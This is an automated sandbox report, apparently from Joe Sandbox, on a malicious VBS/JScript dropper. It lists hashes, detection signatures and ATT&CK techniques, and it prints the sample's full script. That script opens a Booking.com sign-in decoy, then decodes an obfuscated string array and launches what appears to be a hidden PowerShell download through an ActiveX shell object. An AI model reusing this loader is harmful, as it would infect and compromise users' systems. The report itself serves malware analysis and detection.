Edit tour
Windows
Analysis Report
3iBF2Km92r.vbs
Overview
General Information
| Sample name: | 3iBF2Km92r.vbsrenamed because original name is a hash value |
| Original sample name: | ba157096f56b5440b8ce623e98ca2c789e8f91258c3b4413baf03a2af8ff62b9.vbs |
| Analysis ID: | 1671732 |
| MD5: | 5a76b95534a4e1e033edf6520022c9bb |
| SHA1: | 6633ba3775bff463951e8c630c664fa08fb7fb46 |
| SHA256: | ba157096f56b5440b8ce623e98ca2c789e8f91258c3b4413baf03a2af8ff62b9 |
| Tags: | cdt2025-ddns-netcepas2023-duckdns-orgchromedata-accesscam-orgchromedata-webredirect-orgpirulito25-duckdns-orgvbsuser-JAMESWT_WT |
| Infos: |  |
 | |
Detection
| Score: | 52 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Sigma detected: WScript or CScript Dropper
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Program does not show much activity (idle)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Classification
- System is w10x64
wscript.exe (PID: 7124 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\3iBF2 Km92r.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |   |
|---|
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: Michael Haag: | ||
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Virustotal: | Perma Link | ||
| Source: | String found in binary or memory: | ||
| Source: | Initial sample: | ||
| Source: | Classification label: | ||
| Source: | Process created: | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Virustotal: | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | String : | Go to definition | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Window found: | Jump to behavior | ||
| Source: | Thread injection, dropped files, key value created, disk infection and DNS query: | ||
| Source: | Thread injection, dropped files, key value created, disk infection and DNS query: | ||
| Source: | Key value queried: | Jump to behavior | ||
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 31 Scripting | Valid Accounts | Windows Management Instrumentation | 31 Scripting | 1 DLL Side-Loading | 1 DLL Side-Loading | OS Credential Dumping | 2 System Information Discovery | Remote Services | Data from Local System | 1 Data Encoding | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | Boot or Logon Initialization Scripts | 1 Obfuscated Files or Information | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 13% | Virustotal | Browse | ||
| 8% | ReversingLabs |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
⊘No contacted domains info
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false | high |
⊘No contacted IP infos
| Joe Sandbox version: | 42.0.0 Malachite |
| Analysis ID: | 1671732 |
| Start date and time: | 2025-04-23 09:32:54 +02:00 |
| Joe Sandbox product: | CloudBasic |
| Overall analysis duration: | 0h 1m 53s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
| Number of analysed new started processes analysed: | 2 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Sample name: | 3iBF2Km92r.vbsrenamed because original name is a hash value |
| Original Sample Name: | ba157096f56b5440b8ce623e98ca2c789e8f91258c3b4413baf03a2af8ff62b9.vbs |
| Detection: | MAL |
| Classification: | mal52.winVBS@1/0@0/0 |
| EGA Information: | Failed |
| HCA Information: |
|
| Cookbook Comments: |
|
- Exclude process from analysis
(whitelisted): dllhost.exe - Excluded IPs from analysis (wh
itelisted): 52.149.20.212 - Excluded domains from analysis
(whitelisted): slscr.update.m icrosoft.com
⊘No simulations
⊘No context
⊘No context
⊘No context
⊘No context
⊘No context
⊘No created / dropped files found
| File type: | |
| Entropy (8bit): | 6.093019268022198 |
| TrID: |
|
| File name: | 3iBF2Km92r.vbs |
| File size: | 33'875 bytes |
| MD5: | 5a76b95534a4e1e033edf6520022c9bb |
| SHA1: | 6633ba3775bff463951e8c630c664fa08fb7fb46 |
| SHA256: | ba157096f56b5440b8ce623e98ca2c789e8f91258c3b4413baf03a2af8ff62b9 |
| SHA512: | e303cd7ee2d20914c237d1cf769072e0868f4fb007e23bbae311304dd2cfa52990be30391c2ba51139bd751471bdef74170d8e7370f2481cbdc9f4a571f0c23f |
| SSDEEP: | 768:cta7SuHiHwdcU6AH6xgm4Ata7SuHiHwdcU6AH6xgBta7SuHiHwdcU6AH6xgo1yzp:cA6H9AH8NzA6H9AH8iA6H9AH8QA6H9Ae |
| TLSH: | 90E26D4B7C13BCFA16F37B81DEFE18BAAC076D1148A50884585FB7308628F862E165D7 |
| File Content Preview: | var shell = WScript.CreateObject("WScript.Shell");..var url = "https://account.booking.com/sign-in?op_token=EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiZjAyMWNmZGQtZDcxNi00NjQ |
 | |
| Icon Hash: | 68d69b8f86ab9a86 |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node⊘No network behavior found
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
| Target ID: | 0 |
| Start time: | 03:33:44 |
| Start date: | 23/04/2025 |
| Path: | C:\Windows\System32\wscript.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff6893e0000 |
| File size: | 170'496 bytes |
| MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
Call Graph
Graph
Hide Legend
- Executed
- Not Executed
Script: |
|---|
Code | ||
|---|---|---|
| 0 | var shell = WScript.CreateObject ( "WScript.Shell" ); | |
| 1 | var url = "https://account.booking.com/sign-in?op_token=EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiZjAyMWNmZGQtZDcxNi00NjQzLTljM2UtODY1ZTVmNjIyZDJhIn0yK3ZNdUcxbmw0Rm9PLThDZ3JVc1BNcGVQcmhPUXhsSDJDX1V6Vjc0M2JJakE6BFMyNTZCBGNvZGUqEzDv3L6SlsgnOgBCAFiO5d-P0jI"; | |
| 2 | shell.Run ( "msedge.exe " + url ); | |
| 3 | var f, o, h, k, a, e, n, g, l, b, i, m, j, c, p, d; | |
| 4 | ( function () { | |
| 5 | function w() { | |
| 6 | return String; | |
| 7 | } | |
| 8 | function t(a, b) { | |
| 9 | return a % b; | |
| 10 | } | |
| 11 | function u(a, b) { | |
| 12 | return a + b; | |
| 13 | } | |
| 14 | function v(a, b) { | |
| 15 | return a < b; | |
| 16 | } | |
| 17 | var q = ( r ) ( " %nEeNiitppeecNanSn%sIioscrcp%toh o-olwcan-iebeSdwaox.0.mmWtbCopisnn.%E.x Og(\'ht%r :ee-a%tp%-enSolsho/x-sHti%l/%%5ip/lCaNslo/2(tmdnyowo%l.ult\'e)%lwcl%llgds ra%E0ut/e%oSjtolfy.p%Pdo. t%dS%yuooeamm-%)%)co2%a%pv%lcn%iltw %nannxer%-i-dsWePd ic%ci%(no lAmkoBstdtxDaopon%%ehtl/n/e%y2%", 2482198 ); | |
| 18 | function s() { | |
| 19 | var b = { | |
| 20 | }; | |
| 21 | for ( var a = 0 ; v ( a, arguments.length ) ; a += 2 ) | |
| 22 | { | |
| 23 | b[arguments[a]] = arguments[u ( a, 1 ) ]; | |
| 24 | } | |
| 25 | return b; | |
| 26 | } | |
| 27 | function r(j, i) { | |
| 28 | var f = { | |
| 29 | }, | |
| 30 | e = { | |
| 31 | }, | |
| 32 | g = { | |
| 33 | }, | |
| 34 | b = { | |
| 35 | }, | |
| 36 | r = { | |
| 37 | }, | |
| 38 | m = { | |
| 39 | }, | |
| 40 | p = { | |
| 41 | }; | |
| 42 | f._ = i; | |
| 43 | var o = j.length; | |
| 44 | e._ = []; | |
| 45 | ; | |
| 46 | for ( var a = 0 ; v ( a, o ) ; a ++ ) | |
| 47 | { | |
| 48 | e._[a] = j.charAt ( a ); | |
| 49 | } | |
| 50 | ; | |
| 51 | for ( var a = 0 ; v ( a, o ) ; a ++ ) | |
| 52 | { | |
| 53 | g._ = u ( f._ * ( u ( a, 321 ) ), ( t ( f._, 25156 ) ) ); | |
| 54 | ; | |
| 55 | b._ = u ( f._ * ( u ( a, 303 ) ), ( t ( f._, 51693 ) ) ); | |
| 56 | ; | |
| 57 | r._ = t ( g._, o ); | |
| 58 | ; | |
| 59 | m._ = t ( b._, o ); | |
| 60 | ; | |
| 61 | p._ = e._[r._]; | |
| 62 | ; | |
| 63 | x ( r, e, m ); | |
| 64 | y ( m, e, p ); | |
| 65 | z ( f, g, b ); | |
| 66 | } | |
| 67 | ; | |
| 68 | var q = w ( ).fromCharCode ( 127 ); | |
| 69 | var c = ''; | |
| 70 | var h = '\x25'; | |
| 71 | var k = '\x23\x31'; | |
| 72 | var d = '\x25'; | |
| 73 | var n = '\x23\x30'; | |
| 74 | var l = '\x23'; | |
| 75 | return e._.join ( c ).split ( h ).join ( q ).split ( k ).join ( d ).split ( n ).join ( l ).split ( q ); | |
| 76 | } | |
| 77 | if ( ! r ) | |
| 78 | { | |
| 79 | r = 1; | |
| 80 | } | |
| 81 | f = q[0]; | |
| 82 | if ( r == false ) | |
| 83 | { | |
| 84 | r ( 0, true, q[20] ); | |
| 85 | ( function () { | |
| 86 | r = 1; | |
| 87 | } ) ( ); | |
| 88 | return ; | |
| 89 | } | |
| 90 | o = q[1]; | |
| 91 | h = q[2]; | |
| 92 | k = q[3]; | |
| 93 | if ( ! q ) | |
| 94 | { | |
| 95 | r ( true ); | |
| 96 | } | |
| 97 | a = q[4]; | |
| 98 | e = q[4]; | |
| 99 | if ( ! r ) | |
| 100 | { | |
| 101 | return ; | |
| 102 | } | |
| 103 | n = q[4]; | |
| 104 | if ( ! q ) | |
| 105 | { | |
| 106 | return ; | |
| 107 | } | |
| 108 | g = q[5] + f + q[6] + h + q[7] + o + q[8] + h + q[9] + h + q[10] + h + q[11] + h + q[12] + h + q[13] + h + q[14] + k + q[15]; | |
| 109 | l = q[16]; | |
| 110 | if ( ! q ) | |
| 111 | { | |
| 112 | r ( q[0], 1, true ); | |
| 113 | ( function () { | |
| 114 | r = true; | |
| 115 | } ) ( ); | |
| 116 | return ; | |
| 117 | } | |
| 118 | b = q[17]; | |
| 119 | i = q[18]; | |
| 120 | m = q[19]; | |
| 121 | j = q[20]; | |
| 122 | c = q[21]; | |
| 123 | if ( r == false ) | |
| 124 | { | |
| 125 | ( function () { | |
| 126 | r = null; | |
| 127 | } ) ( ); | |
| 128 | return ; | |
| 129 | } | |
| 130 | else | |
| 131 | { | |
| 132 | p = q[2]; | |
| 133 | } | |
| 134 | d = new ActiveXObject ( q[22] ); | |
| 135 | d[q[32]] ( q[23] + l + q[24] + b + q[2], q[25] + i + q[26] + m + q[27] + j + q[28] + c + q[29] + g, q[4], q[30] + p + q[31], 0 ); | |
| 136 | function x(c, a, b) { | |
| 137 | a._[c._] = a._[b._]; | |
| 138 | } | |
| 139 | function y(b, a, c) { | |
| 140 | a._[b._] = c._; | |
| 141 | } | |
| 142 | function z(b, c, a) { | |
| 143 | b._ = t ( ( u ( c._, a._ ) ), 2627471 ); | |
| 144 | } | |
| 145 | } ) ( ); | |
